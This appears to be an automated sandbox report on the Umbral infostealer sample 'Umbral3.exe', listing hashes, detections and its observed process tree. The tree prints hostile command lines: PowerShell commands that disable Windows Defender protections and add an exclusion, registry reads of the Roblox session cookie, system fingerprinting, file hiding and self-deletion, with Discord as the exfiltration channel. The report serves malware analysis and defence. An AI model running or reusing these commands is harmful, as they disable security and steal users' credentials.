Analysis
max time kernel
119s
max time network
119s
platform
windows7_x64
resource
win7-20240221-en
resource tags
arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
submitted
26-04-2024 13:10
Behavioral task
behavioral1
Sample
Umbral3.exe
Resource
win7-20240221-en
General
Target
Umbral3.exe
Size
229KB
MD5
7a902c87a60986f18a6b097712299256
SHA1
2c01906a39faa9d27a41e0d3cd84e92410b9c483
SHA256
e4e4f9045dc3683a2a69b9c7625f2ff46ed241ff64b47660a039dbc9d34cb0d5
SHA512
c8b75b3f0a77d1f84167af3c431e186802ccd5271fc4a361142e0209541de37f5d584d487bf5ea4b4d921e6e3846267fdea9f65cbd71001331bfea08de5425b6
SSDEEP
6144:tloZMCrIkd8g+EtXHkv/iD4DDUgoOJBiLHaIJtM34b8e1mmi:voZRL+EP8DDUgoOJBiLHaIJtMQI
Malware Config
Signatures
Detect Umbral payload (2 IoCs)
resource: behavioral1/memory/2932-0-0x00000000008C0000-0x0000000000900000-memory.dmp, yara_rule: family_umbral
resource: behavioral1/memory/2932-2-0x000000001B180000-0x000000001B200000-memory.dmp, yara_rule: family_umbral
Drops file in Drivers directory (1 IoCs)
description: File opened for modification, ioc: C:\Windows\System32\drivers\etc\hosts, Process: Umbral3.exe
Deletes itself (1 IoCs)
pid: 1920, Process: cmd.exe
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.
Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 2 IoCs)
flow: 8, ioc: discord.com
flow: 9, ioc: discord.com
Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow: 6, ioc: ip-api.com
Detects videocard installed (1 TTPs, 1 IoCs)
Uses WMIC.exe to determine videocard installed.
pid: 1724, Process: wmic.exe
Runs ping.exe (1 TTPs, 1 IoCs)
pid: 2800, Process: PING.EXE
Suspicious behavior: EnumeratesProcesses (5 IoCs)
pid: 2604, Process: powershell.exe
pid: 3044, Process: powershell.exe
pid: 2452, Process: powershell.exe
pid: 1952, Process: powershell.exe
pid: 2820, Process: powershell.exe
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Suspicious use of WriteProcessMemory (36 IoCs)
Views/modifies file attributes (1 TTPs, 1 IoCs)
pid: 296, Process: attrib.exe
Processes
C:\Users\Admin\AppData\Local\Temp\Umbral3.exe (level 1)
Command line: "C:\Users\Admin\AppData\Local\Temp\Umbral3.exe"
- Drops file in Drivers directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2932
  C:\Windows\system32\attrib.exe (level 2)
  Command line: "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral3.exe"
  - Views/modifies file attributes
  PID:296
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 2)
  Command line: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral3.exe'
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2604
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 2)
  Command line: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3044
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 2)
  Command line: "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2452
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 2)
  Command line: "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1952
  C:\Windows\System32\Wbem\wmic.exe (level 2)
  Command line: "wmic.exe" os get Caption
  - Suspicious use of AdjustPrivilegeToken
  PID:828
  C:\Windows\System32\Wbem\wmic.exe (level 2)
  Command line: "wmic.exe" computersystem get totalphysicalmemory
  - Suspicious use of AdjustPrivilegeToken
  PID:1536
  C:\Windows\System32\Wbem\wmic.exe (level 2)
  Command line: "wmic.exe" csproduct get uuid
  PID:2772
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 2)
  Command line: "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
  - Suspicious behavior: EnumeratesProcesses
  PID:2820
  C:\Windows\System32\Wbem\wmic.exe (level 2)
  Command line: "wmic" path win32_VideoController get name
  - Detects videocard installed
  PID:1724
  C:\Windows\system32\cmd.exe (level 2)
  Command line: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral3.exe" && pause
  - Deletes itself
  - Suspicious use of WriteProcessMemory
  PID:1920
    C:\Windows\system32\PING.EXE (level 3)
    Command line: ping localhost
    - Runs ping.exe
    PID:2800
Network
MITRE ATT&CK Enterprise v15
Downloads
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB
MD5
4c3dada670799e9495dd6c1b6e6814be
SHA1
102d41dbc2ae9e1ceba8b3674d4ed7ce1093ea9d
SHA256
4e5fb77e235bca233d56f18bae4d353d864fa70c74cb8403e059974a73b27f40
SHA512
9e222c7efcba8858a324056f7e37a9b1d9cc893a4d35171718545a2de480376830f8ee14beb0efe28c811ff11d2a8c4b75348602e89e5a6d0ab1cc0a675a3c09